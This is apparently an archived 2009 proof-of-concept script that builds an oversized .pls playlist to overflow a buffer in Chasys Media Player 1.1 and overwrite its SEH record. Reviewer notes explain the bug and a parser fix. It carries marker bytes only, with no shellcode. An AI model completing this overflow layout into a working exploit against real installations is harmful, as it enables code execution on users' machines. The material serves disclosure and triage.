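#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH and NEXT_SEH are overwritten, but shellcode doesn't get executed!
# I have tried a lot of addresses.
# Waiting for the exploit from someone.
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
#
# Reviewer notes:
#   * Python 2 script: the string literals below are byte strings.
#   * The file it writes holds marker bytes only (0x41/0x42/0x43/0xCC) and
#     no payload; it shows that a .pls entry of this length reaches the
#     exception-handler record named in the title.
#   * The fix belongs in the player's playlist parser: bound the length of
#     each FileN value before copying it into a fixed-size buffer.
#   * For triage, a .pls whose File1 value runs to thousands of bytes with
#     no line break is anomalous and worth flagging.

print(" Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC")
print(" Discovered By : zAx")
print(" Contact : ThE-zAx@Hotmail.Com")

# Hex-escaped playlist preamble; decodes to
# "[playlist]\nNumberOfEntries=1\nFile1=". Everything appended after it
# becomes the value of the File1 entry.
header = (
    "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A"
    "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A"
    "\x46\x69\x6C\x65\x31\x3D"
)

# Filler ("A" * 2024) preceding the two 4-byte markers below.
junk = "\x41" * 2024
# Distinct 4-byte markers ("BBBB", "CCCC") so each overwritten field can be
# told apart when the crash is inspected.
next_seh = "\x42" * 4
seh = "\x43" * 4
# Trailing filler; 0xCC is the x86 int3 (breakpoint) opcode.
other_data = "\xCC" * 800

# File1 value is 2024 + 4 + 4 + 800 = 2832 bytes long.
ex = header + junk + next_seh + seh + other_data

# Context manager closes the handle even if the write fails; the original
# bound the handle to `file`, shadowing the Python 2 builtin.
with open("zAx.pls", "w") as out:
    out.write(ex)

# milw0rm.com [2009-03-18]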
Chasys Media Player 1.1 .pls Local Buffer Overflow PoC SEH
zAx
03/18/2009